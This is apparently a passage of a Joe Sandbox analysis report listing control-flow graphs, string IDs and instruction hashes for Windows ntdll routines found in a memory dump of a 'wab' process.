22a9dac6 273->283 288 22a90575-22a9057c 276->288 294 22a90563 277->294 295 22a90553-22a90561 call 22a0fe99 277->295 279->282 280->228 281->280 287 22a90480-22a9048b 281->287 282->191 289 22a9060e-22a90622 282->289 283->272 287->280 292 22a9048d-22a90496 GetPEB 287->292 288->251 293 22a9057e-22a9058e 288->293 289->191 297 22a90498-22a904b3 GetPEB call 229db970 292->297 298 22a904b5-22a904ba call 229db970 292->298 293->251 301 22a90566-22a9056a 294->301 295->301 304 22a904bf-22a904dd call 22a886ba call 229db970 297->304 298->304 301->288 304->280
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                    • API String ID: 0-1700792311
                                                                    • Opcode ID: 7d5843d23ab654749b71f128405511637edcfd49dffd7980d1672c641410db01
                                                                    • Instruction ID: 088d50b4a3233cfdc3862c8f43054d74ac9e02aac383e70c4a082a657f122e8c
                                                                    • Opcode Fuzzy Hash: 7d5843d23ab654749b71f128405511637edcfd49dffd7980d1672c641410db01
                                                                    • Instruction Fuzzy Hash: E2D12236A00785DFCB02DF69C591AADBBF1FF8A354F04C059E9459BA52C734D981CB14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 331 22a163ff-22a1640c 332 22a1642d-22a16432 call 22a61799 331->332 333 22a1640e-22a16420 331->333 332->333 335 22a16422-22a16458 call 22a37e54 333->335 336 22a16434-22a16436 333->336 341 22a1645d-22a1646e 335->341 342 22a16470-22a16477 341->342 343 22a1647d-22a16482 341->343 342->343 344 22a541d3-22a541da 342->344 345 22a16488-22a16492 343->345 346 22a5408e-22a540cc call 22a22f10 call 22a65319 343->346 347 22a54226-22a5422d 344->347 348 22a541dc-22a541e8 call 22a22ab0 344->348 350 22a16494-22a16497 345->350 351 22a164d6-22a164e5 345->351 378 22a540ce-22a540d5 346->378 379 22a54109-22a54117 346->379 354 22a54231-22a54238 347->354 365 22a541f4-22a541fb 348->365 366 22a541ea-22a541ef 348->366 355 22a541b1-22a541cb 350->355 356 22a1649d-22a164a4 350->356 354->341 359 22a5423e-22a5424a call 22a22dd0 354->359 362 22a54284-22a54288 355->362 363 22a541d1 355->363 360 22a164a6-22a164ad 356->360 361 22a164bb 356->361 359->354 395 22a5424c-22a54255 359->395 371 22a542a7-22a542ad call 229e54a0 360->371 372 22a164b3-22a164b6 call 229fdb39 360->372 364 22a164c0-22a164c2 361->364 368 22a5429a 362->368 369 22a5428a-22a54293 call 22a61f13 362->369 363->344 373 22a542d7-22a542ea call 22a620de call 22a22d50 364->373 374 22a164c8-22a164cf 364->374 376 22a54221-22a54223 365->376 377 22a541fd-22a5421c call 22a5ea12 365->377 366->343 381 22a5429d-22a542a2 call 22a1656a 368->381 369->381 404 22a54295 369->404 385 22a542b2-22a542b9 371->385 372->361 373->351 425 22a542f0-22a54300 call 22a38d10 GetPEB 373->425 374->351 384 22a164d1 call 22a24690 374->384 376->347 390 22a54225 376->390 377->376 387 22a540d7-22a540f6 call 22a5ea12 378->387 388 22a540fb-22a540fd 378->388 393 22a164e6-22a164f8 call 22a5a5f0 379->393 394 22a5411d-22a5412b 379->394 381->371 384->351 399 22a542cc-22a542d2 call 229e53d0 385->399 400 22a542bb-22a542ca call 229f22b0 385->400 387->388 388->361 405 22a54103-22a54104 388->405 390->347 418 22a54130-22a54137 393->418 419 22a164fe-22a16505 393->419 394->393 396 22a54257-22a54276 call 22a5ea12 395->396 397 22a5427c-22a5427f 395->397 396->397 397->354 409 22a54281-22a54282 397->409 399->373 400->385 404->368 405->361 409->354 421 22a5415d-22a5415f 418->421 422 22a54139-22a54158 call 22a5ea12 418->422 423 22a1650b-22a16529 call 229fe016 419->423 424 22a5416e 419->424 428 22a54161 421->428 429 22a54162 421->429 422->421 433 22a5417a-22a54181 call 22a63f23 423->433 436 22a1652f-22a1655a call 22a1659e 423->436 424->433 428->429 429->424 433->355 436->373 440 22a16560-22a16565 call 22a1656a 436->440 440->364
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-792281065
                                                                    • Opcode ID: 92f875cb01b8c0edf62f745ae70be49b621b67b6c17a69584d3b37054da2d991
                                                                    • Instruction ID: 77191e60cdcd852ce8b0229ef35038e2be0aefa7c48d825dacc3ed49814f0096
                                                                    • Opcode Fuzzy Hash: 92f875cb01b8c0edf62f745ae70be49b621b67b6c17a69584d3b37054da2d991
                                                                    • Instruction Fuzzy Hash: 81911431F407249BE715CF18DBD5B9E77A0BF54B28F100129EA10BBE89D7789812CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 692 229ea3c0-229ea409 GetPEB 693 229ea40f 692->693 694 22a42bed-22a42bf0 692->694 696 229ea414-229ea417 693->696 694->693 695 22a42bf6-22a42c04 GetPEB 694->695 695->696 697 229ea41d-229ea422 696->697 698 22a42c09-22a42c10 call 229f3d20 696->698 700 229ea428-229ea443 697->700 701 22a42c38-22a42c3d 697->701 705 22a42c22 698->705 706 22a42c12-22a42c20 GetPEB 698->706 703 229ea447-229ea44b 700->703 704 22a42c46-22a42c5d call 229d8918 701->704 707 229ea450-229ea458 703->707 708 229ea5ee-229ea5fd GetPEB 704->708 729 22a42c63-22a42c74 704->729 711 22a42c27-22a42c33 call 22a6ff81 705->711 706->711 707->708 709 229ea45e 707->709 712 229ea603 708->712 713 22a42d0a-22a42d0d 708->713 714 229ea4df-229ea4e3 709->714 715 229ea61c-229ea638 call 22a22bc0 709->715 716 229ea67d-229ea687 709->716 717 229ea54a-229ea550 709->717 718 229ea58b-229ea58f 709->718 719 229ea5b8-229ea5cc 709->719 720 229ea648-229ea664 call 22a22bc0 709->720 721 229ea465-229ea473 call 229ea710 709->721 711->701 724 229ea608-229ea60b 712->724 713->712 730 22a42d13-22a42d21 GetPEB 713->730 732 229ea4eb 714->732 715->707 753 229ea63e-229ea643 715->753 735 229ea4fd-229ea506 716->735 726 229ea572-229ea57c 717->726 727 229ea552-229ea56c call 229ea2c3 717->727 733 22a42cfe-22a42d05 718->733 734 229ea595-229ea59c 718->734 719->708 736 229ea5ce-229ea5d6 719->736 720->707 754 229ea66a-229ea672 720->754 721->726 752 229ea479-229ea48f 721->752 738 22a42d26-22a42d2d call 229f3d20 724->738 739 229ea611-229ea619 724->739 726->707 727->726 764 229ea68c-229ea6ab call 22a25130 call 22a057c0 727->764 742 22a42c76 729->742 743 22a42c7e 729->743 730->724 745 229ea4ef-229ea4f7 732->745 733->708 734->704 749 229ea5a2-229ea5b3 734->749 746 229ea508-229ea50b 735->746 747 229ea524-229ea528 735->747 750 22a42cf4-22a42cf9 736->750 751 229ea5dc-229ea5e9 736->751 771 22a42d3f 738->771 772 22a42d2f-22a42d3d GetPEB 738->772 742->743 760 22a42c85-22a42c8c 743->760 745->707 745->735 755 229ea510-229ea51a 746->755 747->708 756 229ea52e-229ea545 747->756 749->745 750->703 751->732 752->726 759 229ea495-229ea4be call 229ea830 752->759 753->732 754->707 761 229ea678 754->761 762 229ea51c-229ea522 755->762 763 229ea581-229ea583 755->763 756->707 759->726 776 229ea4c4-229ea4c9 759->776 767 229ea4cf-229ea4dd 760->767 768 22a42c92-22a42ca0 760->768 761->732 762->747 762->755 763->707 770 229ea589 763->770 781 22a42ce7-22a42cef 764->781 782 229ea6b1-229ea6c6 764->782 767->745 768->767 770->747 775 22a42d44-22a42d50 call 22a6ff81 771->775 772->775 776->760 776->767 781->726 783 22a42ca5-22a42cc8 call 229ea830 782->783 784 229ea6cc-229ea6e7 782->784 787 22a42cd9-22a42cde 783->787 788 22a42cca-22a42ccf 783->788 784->745 787->781 788->787
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                    • API String ID: 0-379654539
                                                                    • Opcode ID: 28f2f2898012466dcede7784d5aa289658529da113dbbe78c8a19df7d5dc70ef
                                                                    • Instruction ID: f9e17331beb3f0f6679757e8a6a0cea85186a93816903e988ce2211c75689f78
                                                                    • Opcode Fuzzy Hash: 28f2f2898012466dcede7784d5aa289658529da113dbbe78c8a19df7d5dc70ef
                                                                    • Instruction Fuzzy Hash: 24C18E75608386CFC712CF14C580B5AB7E4FF94708F00896AF99ACB661EB78CA45CB56
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • Actx , xrefs: 22A133AC
                                                                    • SXS: %s() passed the empty activation context data, xrefs: 22A529FE
                                                                    • RtlCreateActivationContext, xrefs: 22A529F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                    • API String ID: 0-859632880
                                                                    • Opcode ID: ed8860ce1dcb9f38a606daa80e1fe44aa28ed51b91c113ee84b1e7ea7876b710
                                                                    • Instruction ID: dbe628c03bf682e6460d52b96fc950ad8e00db7e8fc69a5c67fb1a813b98db4d
                                                                    • Opcode Fuzzy Hash: ed8860ce1dcb9f38a606daa80e1fe44aa28ed51b91c113ee84b1e7ea7876b710
                                                                    • Instruction Fuzzy Hash: A4312F32A003019FEF16CE68D8C1F9A77A5BF48725F018469FE059FA86CB70E851CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • BuildLabEx, xrefs: 22A2130F
                                                                    • @, xrefs: 22A212A5
                                                                    • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 22A2127B
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                    • API String ID: 0-3051831665
                                                                    • Opcode ID: 7ea2fb9b038f9dda472fe5fe5625694ad9a68a50f9521e803a37e520a8861627
                                                                    • Instruction ID: 69cbb9247189bfd09ae5d2a65c84f510566da5ccc2fdb5e4b4276d825d2d691c
                                                                    • Opcode Fuzzy Hash: 7ea2fb9b038f9dda472fe5fe5625694ad9a68a50f9521e803a37e520a8861627
                                                                    • Instruction Fuzzy Hash: CA31B072A00B19BFCB119BA5CE40EAEBBB9FB94714F004261EA14A7960D7309A05CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: #%u
                                                                    • API String ID: 48624451-232158463
                                                                    • Opcode ID: df0929bee856dd4d4f1be0e7061fdfb62beed0bd18e322b5e00c00b01f245a89
                                                                    • Instruction ID: fcb6671c9d3ea6ed2132c23b1c8d6fe16ca1fc3a6125d9eacadfcbf86d52299c
                                                                    • Opcode Fuzzy Hash: df0929bee856dd4d4f1be0e7061fdfb62beed0bd18e322b5e00c00b01f245a89
                                                                    • Instruction Fuzzy Hash: 41712971A003499FDB01CFA8CA91FAEB7B8BF18704F154165E904EB651EA38EA41CB60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 229EA309
                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 229EA2FB
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                    • API String ID: 0-2876891731
                                                                    • Opcode ID: a3a2e81a3aaa6a4b990a54c5eb7fb74b543a6fff622cbf6bdced3595ca001094
                                                                    • Instruction ID: b3a7d3109a1a483946117be59798e78dcf740bfdc44321be170bb94139d88604
                                                                    • Opcode Fuzzy Hash: a3a2e81a3aaa6a4b990a54c5eb7fb74b543a6fff622cbf6bdced3595ca001094
                                                                    • Instruction Fuzzy Hash: B241DF31A00749CFDB02CF69C980B6E77B4FF84704F1041A6EA19DB6A1E779CA01CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PreferredUILanguages
                                                                    • API String ID: 0-1884656846
                                                                    • Opcode ID: 6cfadb9f65e802568ebbbda861c65e3c215055ab831694a3565eeca1f4b8fa22
                                                                    • Instruction ID: a8c635b0b6e1b9cdbcb788f4bc6de82391dc7aea1ce623af36635048c7640481
                                                                    • Opcode Fuzzy Hash: 6cfadb9f65e802568ebbbda861c65e3c215055ab831694a3565eeca1f4b8fa22
                                                                    • Instruction Fuzzy Hash: 6F41D536D01319EBDB11DE96C980BEF77F9BF44754F014AAAEA11A7A50D630DE40C7A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 6efc554acf37938f170d771e34e193f2bf0dab2a922c4f878987ae6d7355d7de
                                                                    • Instruction ID: c44acaf7d3341b039dc796171f521111ecd21078712610f84d713736a731d59e
                                                                    • Opcode Fuzzy Hash: 6efc554acf37938f170d771e34e193f2bf0dab2a922c4f878987ae6d7355d7de
                                                                    • Instruction Fuzzy Hash: 36318FB25497459FC711CF28C980A5BBBE8FBC4764F400A6EF9948B650DA34DE04CB96
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c7624e87c08d67b2e954d7ab60717950da9298e663aefd40a6867b79bcc92057
                                                                    • Instruction ID: 7fa8067611d1d21f2d64c9c3decb69e587e55a470cbf6e006de6a8d202c010fe
                                                                    • Opcode Fuzzy Hash: c7624e87c08d67b2e954d7ab60717950da9298e663aefd40a6867b79bcc92057
                                                                    • Instruction Fuzzy Hash: 5C32D271E02319DFCB14CFA8EA90BAEBBB1FF54714F140569E805AB791E7359A01CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c2c28b463aef8d5dcbc094c79b985f73f664fd7c891983462fa02b84489a13ce
                                                                    • Instruction ID: 0c332c469b365c2a0a7c64dac4129d5682c7c68ee05041563d9d475c73467baf
                                                                    • Opcode Fuzzy Hash: c2c28b463aef8d5dcbc094c79b985f73f664fd7c891983462fa02b84489a13ce
                                                                    • Instruction Fuzzy Hash: 25D1F572A00306DBCB05EF64C980FBA77B6FF54718F448A69E915DB682E730D942DB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 86ac81f8def952d8145861d3ffde2df06611844687a7eac3d6ca22e99b86f3a5
                                                                    • Instruction ID: 273f2cf1a96c4035057f8239b68ad3e9c849d2f49f2e3be27f079b760fd7c2e8
                                                                    • Opcode Fuzzy Hash: 86ac81f8def952d8145861d3ffde2df06611844687a7eac3d6ca22e99b86f3a5
                                                                    • Instruction Fuzzy Hash: 7FC158746083418FD764CF54C584BABB7E5FF88308F40495EE989976A1EB74EA04CF92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b5d0bd984b5692cf55b900565baf76ee2d2f77d0967ee5b0da1f803e4609e4b
                                                                    • Instruction ID: 4eae8abd57a8e1c611f1c70fca3e3c8e96c08bb20bcd24b936362a9c2f4ba3ac
                                                                    • Opcode Fuzzy Hash: 9b5d0bd984b5692cf55b900565baf76ee2d2f77d0967ee5b0da1f803e4609e4b
                                                                    • Instruction Fuzzy Hash: A9710432240B01AFD722CF18CA94F5EB7F5FF44B64F104968E6658BAA0D774E944CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c4a4e55db6e1a168bdcdfdc634034b1576bb41dae4e476971d61f9b2fc8ea520
                                                                    • Instruction ID: 102be1518497c0a3447f90b97586af511db0a4cc371c516522b6ef84270a9512
                                                                    • Opcode Fuzzy Hash: c4a4e55db6e1a168bdcdfdc634034b1576bb41dae4e476971d61f9b2fc8ea520
                                                                    • Instruction Fuzzy Hash: 3A818D75A00205DFCB09CFA8C590AAEBBF1FF88314F1581A9D859EB755D734EA41CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 971e1789c35d85b16d426d322177c069ed21755b3edea921089712789464dd18
                                                                    • Instruction ID: 2f98bfba6c0a62e76f1bb5b4279f7ca81e027950afd69f202451c7a323d3cd0f
                                                                    • Opcode Fuzzy Hash: 971e1789c35d85b16d426d322177c069ed21755b3edea921089712789464dd18
                                                                    • Instruction Fuzzy Hash: 5461F4313057838BD321CF64C6E4B6AB7F4BF90708F1449ADE9958BA81DB35E806CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 082431e87df506f43b4a2f713a5a1b390a3d14593dbfead7c958d48b915d11e3
                                                                    • Instruction ID: 31789bd4275bba1c471aa496bd12e253ab583fb331d53de8ac4d4e0de0f6b615
                                                                    • Opcode Fuzzy Hash: 082431e87df506f43b4a2f713a5a1b390a3d14593dbfead7c958d48b915d11e3
                                                                    • Instruction Fuzzy Hash: E8416972241700DFC7269F19CAA0B1AB7A9FF54720F1184AAF559DBA90DB70EC41DB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0f1ff176004a179f31c9a6bdeff9a91a510104d2a5f26b22516f397103fa232f
                                                                    • Instruction ID: 1fe54fa64c5bec32a35613bdc5ac01057bb1d43230afd67223abaaa2ac476527
                                                                    • Opcode Fuzzy Hash: 0f1ff176004a179f31c9a6bdeff9a91a510104d2a5f26b22516f397103fa232f
                                                                    • Instruction Fuzzy Hash: 665158726087429FD705CF68C990B5ABBE5FFC8348F048A2DF99497680DB34E945CB52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
